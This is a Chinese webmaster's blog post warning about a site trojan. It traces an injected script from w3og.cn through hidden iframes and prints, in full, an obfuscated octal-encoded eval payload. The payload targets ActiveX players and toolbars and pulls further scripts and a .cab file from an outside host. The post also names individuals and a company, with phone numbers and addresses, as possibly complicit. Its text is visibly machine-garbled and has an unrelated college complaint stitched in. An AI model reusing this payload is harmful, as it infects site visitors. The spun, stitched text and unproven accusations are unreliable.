站长当心:大伙儿留意这1个挂马的

2021-02-27 08:10 admin

有1个站被挂马很长期了,前台接待网页页面的马被清掉,但后台管理的马1直找不到,确实不舒适,提前准备将这个站自尽掉,但又不甘愿,决策再找1次。
花了4个多小时,终究寻找了,现贴出来提示大伙儿留意,大伙儿1定不必点马所属的网站地址,除非你安裝了杀毒手机软件,光1个360是不好的。
先看这1段编码:
<html xmlns="http://www.w3.org/1999/xhtml">
<script language='JavaScript' type='text/JavaScript' src='http://www.w3og.cn/org'></script>
<head>
留意在其中的'http://www.w3og.cn/org',这是木马网页页面详细地址。很有蒙骗性,我找过许多次都没留意到。服务器好象是4川乐山电信的,我基本上要拿我自身的服务器与之两败俱伤。
再强调1下,贴出来并不是重要你啊,不必乱点。
Domain Name: w3og.cn
ROID: 20080213s10001s70391079-cn
Domain Status: ok
Registrant Organization: 陈强
Registrant Name: 陈强
Administrative Email: zhuya22
Sponsoring Registrar: 北京新网数码信息内容技术性比较有限企业
Name Server:ns2.xinnet.cn
Name Server:ns2.xinnetdns.com
Registration Date: 2008-02⑴3 17:16
Expiration Date: 2011-02⑴3 17:16



http://www.zjedu.gov.cn/TzemailA ... 277010f71e2c65c0027
电子器件电子邮件: zhuya22
联络电話: 0577658796549
联络详细地址: 电扇士大夫
递交時间: 2006⑴2⑴1
主题: 这样的设备也能办大学???
提议內容: 温职院INTERNET网硬件配置设备太差 每栋寝室楼网速1直以来比拨号
上网还慢 ,压根不可以考虑大学员对TNTER网的要求
交了30元/月的网费却只能上废弃物互联网,收了大家的心血钱却不干人事,气人兮
气人,
院校主机房既小又差,还1。5元/小时,我靠 这也叫大学吗??大家学剩
上网只能跑正上的网吧,远又网费又贵,许多同学以便省钱只能玩通宵
温职院的互联网设备压根不好,不知道道评定团如何做事的
好笑的是院校还想评全国性10大出色高职 丢死人了


请留意这个企业长沙智之星手机软件比较有限企业www.zzstar.cn,这个木马1直为这个站带总流量,假如是被诬陷的,那还事出有因。假如是同挂马者协作的话,比较严重瞧不起。总主管:廖某某(不贴姓名了)
公 司 地 址: 长沙市麓山大道北343号(矿山科学研究院内)902室
联 系 电 话: 0731⑵173510 (0)
邮 政 编 码: 410012
电 子 邮 箱: zzstar888 zzstar168
公 司 网 址:www.zzstar.cn www.macrorise.com
业务流程联络QQ:7428377 165635301


另外一个受害者的文章内容:今日学员处的人说她们网页页面开启就提醒有病毒感染。上去看了1下,果真,开启以后ie有开启别的网页页面的姿势,访问器很卡,随后跳出来1个RealPlayer的对话框,Nod32提醒
2008⑷⑴8 16:21:09 HTTP 过虑器 文档 http://user1.33216.net/bak.css Win32/TrojanDownloader.Small.OBJ 特洛伊木马 联接终断 - 已防护 NIC\Administrator 根据运用程序流程浏览 web 时检验到威协: C:\Program Files\Maxthon2\Maxthon.exe.

因而刚开始查验。
费了1番时间,就很少说了,立即进到主题。

开启Ethereal,对tcp 80端口号开展监测,开启Firefox,并消除缓存文件(假如不消除将会导致不可以彻底开启)。

彻底开启网页页面后,关掉监测。开展查询。

依照基础理论来讲,应当仅有本机与服务器之间的通讯,哪么别的IP详细地址的通讯就很能够了。

果真,看到了61.174.63.178这个IP(www.w3og.cn/org),应用Ethereal能够看到实际的URL。

应用FF开启这个网页页面。
网页页面是空白的,查询源码內容以下:

www.w3og.cn/org/

document.write("<div style='display:none'>")
document.write("<iframe src=http://abc1.315666.net/s22.html></iframe>")
document.write("<iframe src=http://www.zzstar.cn/reg/w3o.htm></iframe>")
document.write("</div>")

顺藤摸瓜:
在其中
www.zzstar.cb/reg/w30.htm
<script language="javascript" src="http://count48.51yes.com/click.aspx?id=485576456&logo=1"></script>

是51yes的1个统计分析。

http://abc1.315666.net/s22.html
<iframe src="news.html" width=100 height=0></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1793783.js"></script>


第2个网页页面也是统计分析,第1个网页页面便是病毒感染了。
再度应用FF开启,查询源码:

<script>window.onerror=function(){return true;}</script>
<script>
window.defaultStatus="进行";
eval("\164\162\171\173\166\141\162\40\145\73\15\12\166\141\162\40\141\144\157\75\50\144\157\143\165\155\145\156\164\56\143\162\145\141\164\145\105\154\145\155\145\156\164\50\42\157\142\152\145\143\164\42\51\51\73\15\12\166\141\162\40\153\141\166\75\42\134\170\64\142\134\170\66\71\134\170\66\145\134\170\66\67\134\170\67\63\134\170\66\146\134\170\66\66\134\170\67\64\42\73\15\12\141\144\157\56\163\145\164\101\164\164\162\151\142\165\164\145\50\42\143\154\141\163\163\151\144\42\54\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\51\73\15\12\166\141\162\40\153\141\166\75\42\134\170\64\142\134\170\66\71\134\170\66\145\134\170\66\67\134\170\67\63\134\170\66\146\134\170\66\66\134\170\67\64\42\73\15\12\166\141\162\40\141\163\75\141\144\157\56\143\162\145\141\164\145\157\142\152\145\143\164\50\42\101\144\157\144\142\56\123\164\162\145\141\155\42\54\42\42\51\175\15\12\143\141\164\143\150\50\145\51\173\175\73\15\12\146\151\156\141\154\154\171\173\15\12\151\146\50\145\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\163\143\162\151\160\164\40\163\162\143\75\150\164\164\160\72\134\57\134\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\134\57\155\163\60\66\60\61\64\56\152\163\76\74\134\57\163\143\162\151\160\164\76\42\51\175\15\12\145\154\163\145\173\15\12\164\162\171\173\40\166\141\162\40\146\73\15\12\166\141\162\40\164\150\165\156\144\145\162\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\104\120\103\154\151\145\156\164\56\126\157\144\42\51\73\175\15\12\143\141\164\143\150\50\146\51\173\175\73\15\12\146\151\156\141\154\154\171\173\40\151\146\50\146\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\150\164\164\160\72\57\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\57\124\150\165\156\144\145\162\56\150\164\155\154\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\147\73\15\12\166\141\162\40\147\154\167\157\162\154\144\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\107\114\103\110\101\124\56\107\114\103\150\141\164\103\164\162\154\56\61\42\51\73\175\15\12\143\141\164\143\150\50\147\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\147\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\150\164\164\160\72\57\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\57\107\114\127\117\122\114\104\56\150\164\155\154\42\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\150\73\15\12\166\141\162\40\163\164\157\162\155\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\115\120\123\56\123\164\157\162\155\120\154\141\171\145\162\56\61\42\51\73\175\15\12\143\141\164\143\150\50\150\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\150\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\150\164\164\160\72\57\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\57\123\164\157\162\155\111\111\56\150\164\155\154\42\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\151\73\15\12\166\141\162\40\162\145\141\154\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\111\105\122\120\103\164\154\56\111\105\122\120\103\164\154\56\61\42\51\73\175\15\12\143\141\164\143\150\50\151\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\151\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\150\164\164\160\72\57\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\57\122\145\141\154\56\150\164\155\154\42\76\74\57\151\146\162\141\155\145\76\47\51\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\163\103\162\111\160\124\40\114\101\156\107\165\101\147\105\75\42\152\101\166\101\163\103\162\111\160\124\42\40\163\162\143\75\150\164\164\160\72\134\57\134\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\134\57\162\145\141\154\56\152\163\76\74\134\57\163\143\162\151\160\164\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\152\73\15\12\166\141\162\40\102\141\151\144\165\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\102\141\151\144\165\102\141\162\56\124\157\157\154\42\51\73\175\15\12\143\141\164\143\150\50\152\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\152\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\102\141\151\144\165\133\42\134\170\64\64\134\170\66\143\134\170\66\146\134\170\66\61\134\170\66\64\134\170\64\64\134\170\65\63\42\135\50\42\150\164\164\160\72\57\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\57\102\141\151\144\165\56\143\141\142\42\54\40\42\134\170\64\62\134\170\66\61\134\170\66\71\134\170\66\64\134\170\67\65\134\170\62\145\134\170\66\65\134\170\67\70\134\170\66\65\42\54\40\60\51\175\175\15\12\151\146\50\146\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\147\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\150\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\151\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\152\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\15\12\173\154\157\143\141\164\151\157\156\56\162\145\160\154\141\143\145\50\42\141\142\157\165\164\72\142\154\141\156\153\42\51\73\175\175\175")
/*Extreme*/
</script>

很明显,这个便是病毒感染源码了。数据加密了并且,无论他了。
此外留意到,
http://www.51.la/report/0_help.asp?id=1793783&err=4&help=2
能够看到统计分析名字。不便是以便1点总流量,做这些违法犯罪的事儿,何苦呢?



1、应用FF Ethereal。FF不容易被这些系统漏洞运用,而IE基础是1开启就死了。
2、提交的系统漏洞坐落于\xgc\AD\200804\1.js,应当是用的动易的系统漏洞提交的。
3、检索w3og.cn,基础检索到的网页页面,google都会提醒是故意网站...

有着这个W3og.cn的人的申请注册信息内容:
Domain Name: w3og.cn ROID: 20080213s10001s70391079-cn Domain Status: ok Registrant Organization: 陈强 Registrant Name: 陈强 Administrative Email: zhuya22 Sponsoring Registrar: 北京新网数码信息内容技术性比较有限企业 Name Server:ns2.xinnet.cn Name Server:ns2.xinnetdns.com Registration Date: 2008-02⑴3 17:16 Expiration Date: 2011-02⑴3 17:16

这个w3og.cn和zzstar(1家建网站企业)明显是相关系的,否则也不容易再木马里边挂上zzstar的总流量统计分析...